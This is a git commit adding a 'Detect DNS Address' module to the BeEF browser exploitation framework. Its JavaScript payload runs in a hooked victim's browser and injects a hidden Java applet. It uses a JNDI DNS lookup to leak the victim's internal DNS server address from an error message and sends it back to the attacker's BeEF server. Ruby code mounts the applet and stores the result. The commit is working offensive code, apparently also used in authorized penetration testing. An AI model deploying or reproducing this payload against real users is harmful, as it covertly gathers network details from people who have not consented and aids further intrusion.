Added module: Detect DNS Address

Fixes issue 141 git-svn-id: https://beef.googlecode.com/svn/trunk@1211 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2011-08-19 06:33:21 +00:00
parent cddf0e598c
commit a0ba7fa7fc
4 changed files with 143 additions and 0 deletions
--- a/modules/network/detect_dns_address/command.js
+++ b/modules/network/detect_dns_address/command.js
@@ -0,0 +1,70 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var command_timeout = "<%= @command_timeout %>";
+	var Packz = undefined;
+	var internal_counter = 0;
+
+	content = "<APPLET code='doNothing' codebase='http://"+beef.net.host+":"+beef.net.port+"/doNothing.class' width=0 height=0 id='beefdns' name='beefdns'></APPLET>";
+	$j('body').append(content);
+
+	function checkDns() {
+
+		var result = "";
+
+		try {
+			var env = new Packages.java.util.Hashtable();
+			env.put("java.naming.factory.initial", "com.sun.jndi.dns.DnsContextFactory");
+			env.put("java.naming.provider.url", "dns://");
+			var ctx = new Packages.javax.naming.directory.InitialDirContext(env);
+			var attrs = ctx.getAttributes("localhost",['*']);
+		} catch(e) {
+			var d="";
+			if (typeof e != "string") d=e.message; else d=e.toString();
+			var re=new RegExp("java.net.SocketPermission.([^:]*)");
+			var g=re.exec(d);
+			result = g[1];
+		}
+
+		return(result);
+	}
+
+	function waituntilok() {
+
+		try {
+			var output = checkDns();
+
+			if (output != null) {
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, "dns_address="+output);
+				$j('#beefdns').detach();
+				return;
+			} else throw("command results haven't been returned yet");
+		} catch (e) {
+
+			internal_counter++;
+			if (internal_counter > command_timeout) {
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=time out');
+				$j('#beefdns').detach();
+				return;
+			}
+			setTimeout(function() {waituntilok()},1000);
+		}
+	}
+
+	waituntilok();
+
+});
--- a/modules/network/detect_dns_address/config.yaml
+++ b/modules/network/detect_dns_address/config.yaml
@@ -0,0 +1,27 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        detect_dns_address:
+            enable: true
+            category: "Network"
+            name: "Detect DNS Address"
+            description: "Detects the client's DNS address using Java."
+            authors: ["bcoles"]
+            target:
+                working: "FF"
+                user_notify: "IE"
+                not_working: ["S", "O", "C"]
--- a/modules/network/detect_dns_address/doNothing.class
+++ b/modules/network/detect_dns_address/doNothing.class
--- a/modules/network/detect_dns_address/module.rb
+++ b/modules/network/detect_dns_address/module.rb
@@ -0,0 +1,46 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+# Uses the Packages.javax.naming package with DNS of "dns://"
+# Technique discovered by Stefano Di Paola from Minded Security Research Labs
+# Advisory: http://blog.mindedsecurity.com/2010/10/get-internal-network-information-with.html
+
+class Detect_dns_address < BeEF::Core::Command
+
+  def pre_send
+    # Mount the doNothing.class on /doNothing.class
+    # Unsure if there's something we can add here to check if the module was already mounted?
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/detect_dns_address/doNothing.class','/doNothing','class')
+  end
+  
+  def self.options
+    return [
+        {'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'}
+    ]
+  end
+ 
+  def callback
+    content = {}
+    content['dns_address'] = @datastore['dns_address'] if not @datastore['dns_address'].nil?
+    content['fail'] = @datastore['fail'] if not @datastore['fail'].nil? 
+    content['fail'] = 'could not detect dns address' if content.empty?
+    save content
+
+    # Unmount the class now, it's no longer required.
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/doNothing.class');
+
+  end
+  
+end